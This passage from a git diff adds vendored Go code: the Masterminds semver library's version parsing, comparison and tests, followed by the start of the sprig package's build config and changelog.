+comparisons with ||. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking
+for a version that's greater than or equal to 1.2 and less than 3.0.0, or is
+greater than or equal to 4.2.3.
+
+The basic comparisons are:
+
+ * `=`: equal (aliased to no operator)
+ * `!=`: not equal
+ * `>`: greater than
+ * `<`: less than
+ * `>=`: greater than or equal to
+ * `<=`: less than or equal to
+
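+As a sketch of how these compose (a hand-written illustration, not part of
+the upstream docs):
+
+    c, _ := semver.NewConstraint(">= 1.2, < 3.0.0 || >= 4.2.3")
+    c.Check(semver.MustParse("2.5.0")) // true: the first OR branch matches
+    c.Check(semver.MustParse("3.1.0")) // false: neither branch matches
+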
+Hyphen Range Comparisons
+
+There are multiple methods to handle ranges and the first is hyphen ranges.
+These look like:
+
+ * `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+ * `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
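+For example (an illustrative sketch):
+
+    c, _ := semver.NewConstraint("1.2 - 1.4.5")
+    c.Check(semver.MustParse("1.3.0")) // true
+    c.Check(semver.MustParse("1.5.0")) // false
+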
+Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as a wildcard character. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the patch level comparison (see tilde below). For example,
+
+ * `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+ * `>= 1.2.x` is equivalent to `>= 1.2.0`
+ * `<= 2.x` is equivalent to `< 3`
+ * `*` is equivalent to `>= 0.0.0`
+
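+For instance (an illustrative sketch):
+
+    c, _ := semver.NewConstraint("1.2.x")
+    c.Check(semver.MustParse("1.2.9")) // true
+    c.Check(semver.MustParse("1.3.0")) // false
+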
+Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+ * `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+ * `~1` is equivalent to `>= 1, < 2`
+ * `~2.3` is equivalent to `>= 2.3, < 2.4`
+ * `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+ * `~1.x` is equivalent to `>= 1, < 2`
+
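+A quick sketch of the tilde behavior (mirroring the test table):
+
+    c, _ := semver.NewConstraint("~1.2.3")
+    c.Check(semver.MustParse("1.2.5")) // true
+    c.Check(semver.MustParse("1.3.0")) // false
+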
+Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+when comparing API versions, as a major change is API breaking. For example,
+
+ * `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+ * `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+ * `^2.3` is equivalent to `>= 2.3, < 3`
+ * `^2.x` is equivalent to `>= 2.0.0, < 3`
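+
+And a caret sketch (same illustrative caveat):
+
+    c, _ := semver.NewConstraint("^1.2.3")
+    c.Check(semver.MustParse("1.4.0")) // true
+    c.Check(semver.MustParse("2.0.0")) // false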
+*/
+package semver
diff --git a/vendor/github.com/Masterminds/semver/version.go b/vendor/github.com/Masterminds/semver/version.go
new file mode 100644
index 0000000000..9d22ea6308
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/version.go
@@ -0,0 +1,421 @@
+package semver
+
+import (
+ "bytes"
+ "encoding/json"
+ "errors"
+ "fmt"
+ "regexp"
+ "strconv"
+ "strings"
+)
+
+// The compiled version of the regex created at init() is cached here so it
+// only needs to be created once.
+var versionRegex *regexp.Regexp
+var validPrereleaseRegex *regexp.Regexp
+
+var (
+	// ErrInvalidSemVer is returned when a version is found to be invalid
+	// during parsing.
+ ErrInvalidSemVer = errors.New("Invalid Semantic Version")
+
+ // ErrInvalidMetadata is returned when the metadata is an invalid format
+ ErrInvalidMetadata = errors.New("Invalid Metadata string")
+
+ // ErrInvalidPrerelease is returned when the pre-release is an invalid format
+ ErrInvalidPrerelease = errors.New("Invalid Prerelease string")
+)
+
+// SemVerRegex is the regular expression used to parse a semantic version.
+const SemVerRegex string = `v?([0-9]+)(\.[0-9]+)?(\.[0-9]+)?` +
+ `(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` +
+ `(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?`
+
+// ValidPrerelease is the regular expression which validates
+// both prerelease and metadata values.
+const ValidPrerelease string = `^([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*)`
+
+// Version represents a single semantic version.
+type Version struct {
+ major, minor, patch int64
+ pre string
+ metadata string
+ original string
+}
+
+func init() {
+ versionRegex = regexp.MustCompile("^" + SemVerRegex + "$")
+ validPrereleaseRegex = regexp.MustCompile(ValidPrerelease)
+}
+
+// NewVersion parses a given version and returns an instance of Version or
+// an error if unable to parse the version.
+func NewVersion(v string) (*Version, error) {
+ m := versionRegex.FindStringSubmatch(v)
+ if m == nil {
+ return nil, ErrInvalidSemVer
+ }
+
+ sv := &Version{
+ metadata: m[8],
+ pre: m[5],
+ original: v,
+ }
+
+ var temp int64
+ temp, err := strconv.ParseInt(m[1], 10, 64)
+ if err != nil {
+ return nil, fmt.Errorf("Error parsing version segment: %s", err)
+ }
+ sv.major = temp
+
+ if m[2] != "" {
+ temp, err = strconv.ParseInt(strings.TrimPrefix(m[2], "."), 10, 64)
+ if err != nil {
+ return nil, fmt.Errorf("Error parsing version segment: %s", err)
+ }
+ sv.minor = temp
+ } else {
+ sv.minor = 0
+ }
+
+ if m[3] != "" {
+ temp, err = strconv.ParseInt(strings.TrimPrefix(m[3], "."), 10, 64)
+ if err != nil {
+ return nil, fmt.Errorf("Error parsing version segment: %s", err)
+ }
+ sv.patch = temp
+ } else {
+ sv.patch = 0
+ }
+
+ return sv, nil
+}
+
+// MustParse parses a given version and panics on error.
+func MustParse(v string) *Version {
+ sv, err := NewVersion(v)
+ if err != nil {
+ panic(err)
+ }
+ return sv
+}
+
+// String converts a Version object to a string.
+// Note, if the original version contained a leading v this version will not.
+// See the Original() method to retrieve the original value. Semantic Versions
+// don't contain a leading v per the spec. Instead it's optional at the
+// implementation level.
+func (v *Version) String() string {
+ var buf bytes.Buffer
+
+ fmt.Fprintf(&buf, "%d.%d.%d", v.major, v.minor, v.patch)
+ if v.pre != "" {
+ fmt.Fprintf(&buf, "-%s", v.pre)
+ }
+ if v.metadata != "" {
+ fmt.Fprintf(&buf, "+%s", v.metadata)
+ }
+
+ return buf.String()
+}
+
+// Original returns the original value passed in to be parsed.
+func (v *Version) Original() string {
+ return v.original
+}
+
+// Major returns the major version.
+func (v *Version) Major() int64 {
+ return v.major
+}
+
+// Minor returns the minor version.
+func (v *Version) Minor() int64 {
+ return v.minor
+}
+
+// Patch returns the patch version.
+func (v *Version) Patch() int64 {
+ return v.patch
+}
+
+// Prerelease returns the pre-release version.
+func (v *Version) Prerelease() string {
+ return v.pre
+}
+
+// Metadata returns the metadata on the version.
+func (v *Version) Metadata() string {
+ return v.metadata
+}
+
+// originalVPrefix returns the original 'v' prefix if any.
+func (v *Version) originalVPrefix() string {
+
+ // Note, only lowercase v is supported as a prefix by the parser.
+ if v.original != "" && v.original[:1] == "v" {
+ return v.original[:1]
+ }
+ return ""
+}
+
+// IncPatch produces the next patch version.
+// If the current version does not have prerelease/metadata information,
+// it unsets metadata and prerelease values and increments the patch number.
+// If the current version has any prerelease or metadata information,
+// it unsets both values and keeps the current patch value.
+func (v Version) IncPatch() Version {
+ vNext := v
+ // according to http://semver.org/#spec-item-9
+ // Pre-release versions have a lower precedence than the associated normal version.
+ // according to http://semver.org/#spec-item-10
+ // Build metadata SHOULD be ignored when determining version precedence.
+ if v.pre != "" {
+ vNext.metadata = ""
+ vNext.pre = ""
+ } else {
+ vNext.metadata = ""
+ vNext.pre = ""
+ vNext.patch = v.patch + 1
+ }
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext
+}
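+
+// For illustration (an added sketch, not upstream documentation):
+//
+//	MustParse("1.2.3").IncPatch().String()      // "1.2.4"
+//	MustParse("1.2.3-beta").IncPatch().String() // "1.2.3"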
+
+// IncMinor produces the next minor version.
+// Sets patch to 0.
+// Increments minor number.
+// Unsets metadata.
+// Unsets prerelease status.
+func (v Version) IncMinor() Version {
+ vNext := v
+ vNext.metadata = ""
+ vNext.pre = ""
+ vNext.patch = 0
+ vNext.minor = v.minor + 1
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext
+}
+
+// IncMajor produces the next major version.
+// Sets patch to 0.
+// Sets minor to 0.
+// Increments major number.
+// Unsets metadata.
+// Unsets prerelease status.
+func (v Version) IncMajor() Version {
+ vNext := v
+ vNext.metadata = ""
+ vNext.pre = ""
+ vNext.patch = 0
+ vNext.minor = 0
+ vNext.major = v.major + 1
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext
+}
+
+// SetPrerelease defines the prerelease value.
+// Value must not include the required 'hyphen' prefix.
+func (v Version) SetPrerelease(prerelease string) (Version, error) {
+ vNext := v
+ if len(prerelease) > 0 && !validPrereleaseRegex.MatchString(prerelease) {
+ return vNext, ErrInvalidPrerelease
+ }
+ vNext.pre = prerelease
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext, nil
+}
+
+// SetMetadata defines metadata value.
+// Value must not include the required 'plus' prefix.
+func (v Version) SetMetadata(metadata string) (Version, error) {
+ vNext := v
+ if len(metadata) > 0 && !validPrereleaseRegex.MatchString(metadata) {
+ return vNext, ErrInvalidMetadata
+ }
+ vNext.metadata = metadata
+ vNext.original = v.originalVPrefix() + "" + vNext.String()
+ return vNext, nil
+}
+
+// LessThan tests if one version is less than another one.
+func (v *Version) LessThan(o *Version) bool {
+ return v.Compare(o) < 0
+}
+
+// GreaterThan tests if one version is greater than another one.
+func (v *Version) GreaterThan(o *Version) bool {
+ return v.Compare(o) > 0
+}
+
+// Equal tests if two versions are equal to each other.
+// Note, versions can be equal with different metadata since metadata
+// is not considered part of the comparable version.
+func (v *Version) Equal(o *Version) bool {
+ return v.Compare(o) == 0
+}
+
+// Compare compares this version to another one. It returns -1, 0, or 1 if
+// the version is smaller, equal, or larger than the other version.
+//
+// Versions are compared by X.Y.Z. Build metadata is ignored. Prerelease is
+// lower than the version without a prerelease.
+func (v *Version) Compare(o *Version) int {
+ // Compare the major, minor, and patch version for differences. If a
+ // difference is found return the comparison.
+ if d := compareSegment(v.Major(), o.Major()); d != 0 {
+ return d
+ }
+ if d := compareSegment(v.Minor(), o.Minor()); d != 0 {
+ return d
+ }
+ if d := compareSegment(v.Patch(), o.Patch()); d != 0 {
+ return d
+ }
+
+ // At this point the major, minor, and patch versions are the same.
+ ps := v.pre
+ po := o.Prerelease()
+
+ if ps == "" && po == "" {
+ return 0
+ }
+ if ps == "" {
+ return 1
+ }
+ if po == "" {
+ return -1
+ }
+
+ return comparePrerelease(ps, po)
+}
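+
+// A short precedence sketch (added for illustration):
+//
+//	MustParse("1.2.3").Compare(MustParse("1.2.3-beta")) // 1: prerelease sorts lower
+//	MustParse("1.2.3+a").Compare(MustParse("1.2.3+b"))  // 0: metadata is ignored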
+
+// UnmarshalJSON implements JSON.Unmarshaler interface.
+func (v *Version) UnmarshalJSON(b []byte) error {
+ var s string
+ if err := json.Unmarshal(b, &s); err != nil {
+ return err
+ }
+ temp, err := NewVersion(s)
+ if err != nil {
+ return err
+ }
+ v.major = temp.major
+ v.minor = temp.minor
+ v.patch = temp.patch
+ v.pre = temp.pre
+ v.metadata = temp.metadata
+ v.original = temp.original
+ temp = nil
+ return nil
+}
+
+// MarshalJSON implements JSON.Marshaler interface.
+func (v *Version) MarshalJSON() ([]byte, error) {
+ return json.Marshal(v.String())
+}
+
+func compareSegment(v, o int64) int {
+ if v < o {
+ return -1
+ }
+ if v > o {
+ return 1
+ }
+
+ return 0
+}
+
+func comparePrerelease(v, o string) int {
+
+	// Split the prerelease versions by their parts. The separator, per the
+	// spec, is a dot (.).
+ sparts := strings.Split(v, ".")
+ oparts := strings.Split(o, ".")
+
+ // Find the longer length of the parts to know how many loop iterations to
+ // go through.
+ slen := len(sparts)
+ olen := len(oparts)
+
+ l := slen
+ if olen > slen {
+ l = olen
+ }
+
+ // Iterate over each part of the prereleases to compare the differences.
+ for i := 0; i < l; i++ {
+		// Since the length of the parts can be different we need to create
+ // a placeholder. This is to avoid out of bounds issues.
+ stemp := ""
+ if i < slen {
+ stemp = sparts[i]
+ }
+
+ otemp := ""
+ if i < olen {
+ otemp = oparts[i]
+ }
+
+ d := comparePrePart(stemp, otemp)
+ if d != 0 {
+ return d
+ }
+ }
+
+	// Reaching here means the two prerelease strings compared as equal on
+	// every part, so the versions are of equal precedence.
+ return 0
+}
+
+func comparePrePart(s, o string) int {
+ // Fastpath if they are equal
+ if s == o {
+ return 0
+ }
+
+ // When s or o are empty we can use the other in an attempt to determine
+ // the response.
+ if s == "" {
+ if o != "" {
+ return -1
+ }
+ return 1
+ }
+
+ if o == "" {
+ if s != "" {
+ return 1
+ }
+ return -1
+ }
+
+ // When comparing strings "99" is greater than "103". To handle
+ // cases like this we need to detect numbers and compare them.
+
+ oi, n1 := strconv.ParseInt(o, 10, 64)
+ si, n2 := strconv.ParseInt(s, 10, 64)
+
+	// The case where both are non-numeric strings: compare them as strings
+ if n1 != nil && n2 != nil {
+ if s > o {
+ return 1
+ }
+ return -1
+ } else if n1 != nil {
+ // o is a string and s is a number
+ return -1
+ } else if n2 != nil {
+ // s is a string and o is a number
+ return 1
+ }
+ // Both are numbers
+ if si > oi {
+ return 1
+ }
+ return -1
+
+}
diff --git a/vendor/github.com/Masterminds/semver/version_test.go b/vendor/github.com/Masterminds/semver/version_test.go
new file mode 100644
index 0000000000..ff5d644a74
--- /dev/null
+++ b/vendor/github.com/Masterminds/semver/version_test.go
@@ -0,0 +1,490 @@
+package semver
+
+import (
+ "encoding/json"
+ "fmt"
+ "testing"
+)
+
+func TestNewVersion(t *testing.T) {
+ tests := []struct {
+ version string
+ err bool
+ }{
+ {"1.2.3", false},
+ {"v1.2.3", false},
+ {"1.0", false},
+ {"v1.0", false},
+ {"1", false},
+ {"v1", false},
+ {"1.2.beta", true},
+ {"v1.2.beta", true},
+ {"foo", true},
+ {"1.2-5", false},
+ {"v1.2-5", false},
+ {"1.2-beta.5", false},
+ {"v1.2-beta.5", false},
+ {"\n1.2", true},
+ {"\nv1.2", true},
+ {"1.2.0-x.Y.0+metadata", false},
+ {"v1.2.0-x.Y.0+metadata", false},
+ {"1.2.0-x.Y.0+metadata-width-hypen", false},
+ {"v1.2.0-x.Y.0+metadata-width-hypen", false},
+ {"1.2.3-rc1-with-hypen", false},
+ {"v1.2.3-rc1-with-hypen", false},
+ {"1.2.3.4", true},
+ {"v1.2.3.4", true},
+ {"1.2.2147483648", false},
+ {"1.2147483648.3", false},
+ {"2147483648.3.0", false},
+ }
+
+ for _, tc := range tests {
+ _, err := NewVersion(tc.version)
+ if tc.err && err == nil {
+ t.Fatalf("expected error for version: %s", tc.version)
+ } else if !tc.err && err != nil {
+ t.Fatalf("error for version %s: %s", tc.version, err)
+ }
+ }
+}
+
+func TestOriginal(t *testing.T) {
+ tests := []string{
+ "1.2.3",
+ "v1.2.3",
+ "1.0",
+ "v1.0",
+ "1",
+ "v1",
+ "1.2-5",
+ "v1.2-5",
+ "1.2-beta.5",
+ "v1.2-beta.5",
+ "1.2.0-x.Y.0+metadata",
+ "v1.2.0-x.Y.0+metadata",
+ "1.2.0-x.Y.0+metadata-width-hypen",
+ "v1.2.0-x.Y.0+metadata-width-hypen",
+ "1.2.3-rc1-with-hypen",
+ "v1.2.3-rc1-with-hypen",
+ }
+
+ for _, tc := range tests {
+ v, err := NewVersion(tc)
+ if err != nil {
+ t.Errorf("Error parsing version %s", tc)
+ }
+
+ o := v.Original()
+ if o != tc {
+			t.Errorf("Error retrieving original. Expected '%s' but got '%s'", tc, v)
+ }
+ }
+}
+
+func TestParts(t *testing.T) {
+ v, err := NewVersion("1.2.3-beta.1+build.123")
+ if err != nil {
+ t.Error("Error parsing version 1.2.3-beta.1+build.123")
+ }
+
+ if v.Major() != 1 {
+ t.Error("Major() returning wrong value")
+ }
+ if v.Minor() != 2 {
+ t.Error("Minor() returning wrong value")
+ }
+ if v.Patch() != 3 {
+ t.Error("Patch() returning wrong value")
+ }
+ if v.Prerelease() != "beta.1" {
+ t.Error("Prerelease() returning wrong value")
+ }
+ if v.Metadata() != "build.123" {
+ t.Error("Metadata() returning wrong value")
+ }
+}
+
+func TestString(t *testing.T) {
+ tests := []struct {
+ version string
+ expected string
+ }{
+ {"1.2.3", "1.2.3"},
+ {"v1.2.3", "1.2.3"},
+ {"1.0", "1.0.0"},
+ {"v1.0", "1.0.0"},
+ {"1", "1.0.0"},
+ {"v1", "1.0.0"},
+ {"1.2-5", "1.2.0-5"},
+ {"v1.2-5", "1.2.0-5"},
+ {"1.2-beta.5", "1.2.0-beta.5"},
+ {"v1.2-beta.5", "1.2.0-beta.5"},
+ {"1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"},
+ {"v1.2.0-x.Y.0+metadata", "1.2.0-x.Y.0+metadata"},
+ {"1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"},
+ {"v1.2.0-x.Y.0+metadata-width-hypen", "1.2.0-x.Y.0+metadata-width-hypen"},
+ {"1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"},
+ {"v1.2.3-rc1-with-hypen", "1.2.3-rc1-with-hypen"},
+ }
+
+ for _, tc := range tests {
+ v, err := NewVersion(tc.version)
+ if err != nil {
+			t.Errorf("Error parsing version %s", tc.version)
+ }
+
+ s := v.String()
+ if s != tc.expected {
+ t.Errorf("Error generating string. Expected '%s' but got '%s'", tc.expected, s)
+ }
+ }
+}
+
+func TestCompare(t *testing.T) {
+ tests := []struct {
+ v1 string
+ v2 string
+ expected int
+ }{
+ {"1.2.3", "1.5.1", -1},
+ {"2.2.3", "1.5.1", 1},
+ {"2.2.3", "2.2.2", 1},
+ {"3.2-beta", "3.2-beta", 0},
+ {"1.3", "1.1.4", 1},
+ {"4.2", "4.2-beta", 1},
+ {"4.2-beta", "4.2", -1},
+ {"4.2-alpha", "4.2-beta", -1},
+ {"4.2-alpha", "4.2-alpha", 0},
+ {"4.2-beta.2", "4.2-beta.1", 1},
+ {"4.2-beta2", "4.2-beta1", 1},
+ {"4.2-beta", "4.2-beta.2", -1},
+ {"4.2-beta", "4.2-beta.foo", -1},
+ {"4.2-beta.2", "4.2-beta", 1},
+ {"4.2-beta.foo", "4.2-beta", 1},
+ {"1.2+bar", "1.2+baz", 0},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := NewVersion(tc.v2)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ a := v1.Compare(v2)
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Comparison of '%s' and '%s' failed. Expected '%d', got '%d'",
+ tc.v1, tc.v2, e, a,
+ )
+ }
+ }
+}
+
+func TestLessThan(t *testing.T) {
+ tests := []struct {
+ v1 string
+ v2 string
+ expected bool
+ }{
+ {"1.2.3", "1.5.1", true},
+ {"2.2.3", "1.5.1", false},
+ {"3.2-beta", "3.2-beta", false},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := NewVersion(tc.v2)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ a := v1.LessThan(v2)
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'",
+ tc.v1, tc.v2, e, a,
+ )
+ }
+ }
+}
+
+func TestGreaterThan(t *testing.T) {
+ tests := []struct {
+ v1 string
+ v2 string
+ expected bool
+ }{
+ {"1.2.3", "1.5.1", false},
+ {"2.2.3", "1.5.1", true},
+ {"3.2-beta", "3.2-beta", false},
+ {"3.2.0-beta.1", "3.2.0-beta.5", false},
+ {"3.2-beta.4", "3.2-beta.2", true},
+ {"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.103", false},
+ {"7.43.0-SNAPSHOT.FOO", "7.43.0-SNAPSHOT.103", true},
+ {"7.43.0-SNAPSHOT.99", "7.43.0-SNAPSHOT.BAR", false},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := NewVersion(tc.v2)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ a := v1.GreaterThan(v2)
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'",
+ tc.v1, tc.v2, e, a,
+ )
+ }
+ }
+}
+
+func TestEqual(t *testing.T) {
+ tests := []struct {
+ v1 string
+ v2 string
+ expected bool
+ }{
+ {"1.2.3", "1.5.1", false},
+ {"2.2.3", "1.5.1", false},
+ {"3.2-beta", "3.2-beta", true},
+ {"3.2-beta+foo", "3.2-beta+bar", true},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := NewVersion(tc.v2)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ a := v1.Equal(v2)
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Comparison of '%s' and '%s' failed. Expected '%t', got '%t'",
+ tc.v1, tc.v2, e, a,
+ )
+ }
+ }
+}
+
+func TestInc(t *testing.T) {
+ tests := []struct {
+ v1 string
+ expected string
+ how string
+ expectedOriginal string
+ }{
+ {"1.2.3", "1.2.4", "patch", "1.2.4"},
+ {"v1.2.4", "1.2.5", "patch", "v1.2.5"},
+ {"1.2.3", "1.3.0", "minor", "1.3.0"},
+ {"v1.2.4", "1.3.0", "minor", "v1.3.0"},
+ {"1.2.3", "2.0.0", "major", "2.0.0"},
+ {"v1.2.4", "2.0.0", "major", "v2.0.0"},
+ {"1.2.3+meta", "1.2.4", "patch", "1.2.4"},
+ {"1.2.3-beta+meta", "1.2.3", "patch", "1.2.3"},
+ {"v1.2.4-beta+meta", "1.2.4", "patch", "v1.2.4"},
+ {"1.2.3-beta+meta", "1.3.0", "minor", "1.3.0"},
+ {"v1.2.4-beta+meta", "1.3.0", "minor", "v1.3.0"},
+ {"1.2.3-beta+meta", "2.0.0", "major", "2.0.0"},
+ {"v1.2.4-beta+meta", "2.0.0", "major", "v2.0.0"},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+ var v2 Version
+ switch tc.how {
+ case "patch":
+ v2 = v1.IncPatch()
+ case "minor":
+ v2 = v1.IncMinor()
+ case "major":
+ v2 = v1.IncMajor()
+ }
+
+ a := v2.String()
+ e := tc.expected
+ if a != e {
+ t.Errorf(
+ "Inc %q failed. Expected %q got %q",
+ tc.how, e, a,
+ )
+ }
+
+ a = v2.Original()
+ e = tc.expectedOriginal
+ if a != e {
+ t.Errorf(
+ "Inc %q failed. Expected original %q got %q",
+ tc.how, e, a,
+ )
+ }
+ }
+}
+
+func TestSetPrerelease(t *testing.T) {
+ tests := []struct {
+ v1 string
+ prerelease string
+ expectedVersion string
+ expectedPrerelease string
+ expectedOriginal string
+ expectedErr error
+ }{
+ {"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidPrerelease},
+ {"1.2.3", "beta", "1.2.3-beta", "beta", "1.2.3-beta", nil},
+ {"v1.2.4", "beta", "1.2.4-beta", "beta", "v1.2.4-beta", nil},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := v1.SetPrerelease(tc.prerelease)
+ if err != tc.expectedErr {
+ t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err)
+ }
+
+ a := v2.Prerelease()
+ e := tc.expectedPrerelease
+ if a != e {
+ t.Errorf("Expected prerelease value=%q, but got %q", e, a)
+ }
+
+ a = v2.String()
+ e = tc.expectedVersion
+ if a != e {
+ t.Errorf("Expected version string=%q, but got %q", e, a)
+ }
+
+ a = v2.Original()
+ e = tc.expectedOriginal
+ if a != e {
+ t.Errorf("Expected version original=%q, but got %q", e, a)
+ }
+ }
+}
+
+func TestSetMetadata(t *testing.T) {
+ tests := []struct {
+ v1 string
+ metadata string
+ expectedVersion string
+ expectedMetadata string
+ expectedOriginal string
+ expectedErr error
+ }{
+ {"1.2.3", "**", "1.2.3", "", "1.2.3", ErrInvalidMetadata},
+ {"1.2.3", "meta", "1.2.3+meta", "meta", "1.2.3+meta", nil},
+ {"v1.2.4", "meta", "1.2.4+meta", "meta", "v1.2.4+meta", nil},
+ }
+
+ for _, tc := range tests {
+ v1, err := NewVersion(tc.v1)
+ if err != nil {
+ t.Errorf("Error parsing version: %s", err)
+ }
+
+ v2, err := v1.SetMetadata(tc.metadata)
+ if err != tc.expectedErr {
+ t.Errorf("Expected to get err=%s, but got err=%s", tc.expectedErr, err)
+ }
+
+ a := v2.Metadata()
+ e := tc.expectedMetadata
+ if a != e {
+ t.Errorf("Expected metadata value=%q, but got %q", e, a)
+ }
+
+ a = v2.String()
+ e = tc.expectedVersion
+ if e != a {
+ t.Errorf("Expected version string=%q, but got %q", e, a)
+ }
+
+ a = v2.Original()
+ e = tc.expectedOriginal
+ if a != e {
+ t.Errorf("Expected version original=%q, but got %q", e, a)
+ }
+ }
+}
+
+func TestOriginalVPrefix(t *testing.T) {
+ tests := []struct {
+ version string
+ vprefix string
+ }{
+ {"1.2.3", ""},
+ {"v1.2.4", "v"},
+ }
+
+ for _, tc := range tests {
+ v1, _ := NewVersion(tc.version)
+ a := v1.originalVPrefix()
+ e := tc.vprefix
+ if a != e {
+ t.Errorf("Expected vprefix=%q, but got %q", e, a)
+ }
+ }
+}
+
+func TestJsonMarshal(t *testing.T) {
+ sVer := "1.1.1"
+ x, err := NewVersion(sVer)
+ if err != nil {
+ t.Errorf("Error creating version: %s", err)
+ }
+ out, err2 := json.Marshal(x)
+ if err2 != nil {
+ t.Errorf("Error marshaling version: %s", err2)
+ }
+ got := string(out)
+ want := fmt.Sprintf("%q", sVer)
+ if got != want {
+ t.Errorf("Error marshaling unexpected marshaled content: got=%q want=%q", got, want)
+ }
+}
+
+func TestJsonUnmarshal(t *testing.T) {
+ sVer := "1.1.1"
+ ver := &Version{}
+ err := json.Unmarshal([]byte(fmt.Sprintf("%q", sVer)), ver)
+ if err != nil {
+ t.Errorf("Error unmarshaling version: %s", err)
+ }
+ got := ver.String()
+ want := sVer
+ if got != want {
+ t.Errorf("Error unmarshaling unexpected object content: got=%q want=%q", got, want)
+ }
+}
diff --git a/vendor/github.com/Masterminds/sprig/.gitignore b/vendor/github.com/Masterminds/sprig/.gitignore
new file mode 100644
index 0000000000..5e3002f88f
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/.gitignore
@@ -0,0 +1,2 @@
+vendor/
+/.glide
diff --git a/vendor/github.com/Masterminds/sprig/.travis.yml b/vendor/github.com/Masterminds/sprig/.travis.yml
new file mode 100644
index 0000000000..2e7c2d68e3
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/.travis.yml
@@ -0,0 +1,23 @@
+language: go
+
+go:
+ - 1.9.x
+ - 1.10.x
+ - tip
+
+# Setting sudo access to false will let Travis CI use containers rather than
+# VMs to run the tests. For more details see:
+# - http://docs.travis-ci.com/user/workers/container-based-infrastructure/
+# - http://docs.travis-ci.com/user/workers/standard-infrastructure/
+sudo: false
+
+script:
+ - make setup test
+
+notifications:
+ webhooks:
+ urls:
+ - https://webhooks.gitter.im/e/06e3328629952dabe3e0
+ on_success: change # options: [always|never|change] default: always
+ on_failure: always # options: [always|never|change] default: always
+ on_start: never # options: [always|never|change] default: always
diff --git a/vendor/github.com/Masterminds/sprig/CHANGELOG.md b/vendor/github.com/Masterminds/sprig/CHANGELOG.md
new file mode 100644
index 0000000000..445937138a
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/CHANGELOG.md
@@ -0,0 +1,153 @@
+# Changelog
+
+## Release 2.15.0 (2018-04-02)
+
+### Added
+
+- #68 and #69: Add json helpers to docs (thanks @arunvelsriram)
+- #66: Add ternary function (thanks @binoculars)
+- #67: Allow keys function to take multiple dicts (thanks @binoculars)
+- #89: Added sha1sum to crypto function (thanks @benkeil)
+- #81: Allow customizing Root CA that used by genSignedCert (thanks @chenzhiwei)
+- #92: Add travis testing for go 1.10
+- #93: Adding appveyor config for windows testing
+
+### Changed
+
+- #90: Updating to more recent dependencies
+- #73: replace satori/go.uuid with google/uuid (thanks @petterw)
+
+### Fixed
+
+- #76: Fixed documentation typos (thanks @Thiht)
+- Fixed rounding issue on the `ago` function. Note, this removes support for Go 1.8 and older
+
+## Release 2.14.1 (2017-12-01)
+
+### Fixed
+
+- #60: Fix typo in function name documentation (thanks @neil-ca-moore)
+- #61: Removing a line with {{ that was blocking GitHub Pages generation
+- #64: Update the list functions to handle int, string, and other slices for compatibility
+
+## Release 2.14.0 (2017-10-06)
+
+This new version of Sprig adds a set of functions for generating and working with SSL certificates.
+
+- `genCA` generates an SSL Certificate Authority
+- `genSelfSignedCert` generates an SSL self-signed certificate
+- `genSignedCert` generates an SSL certificate and key based on a given CA
+
+## Release 2.13.0 (2017-09-18)
+
+This release adds new functions, including:
+
+- `regexMatch`, `regexFindAll`, `regexFind`, `regexReplaceAll`, `regexReplaceAllLiteral`, and `regexSplit` to work with regular expressions
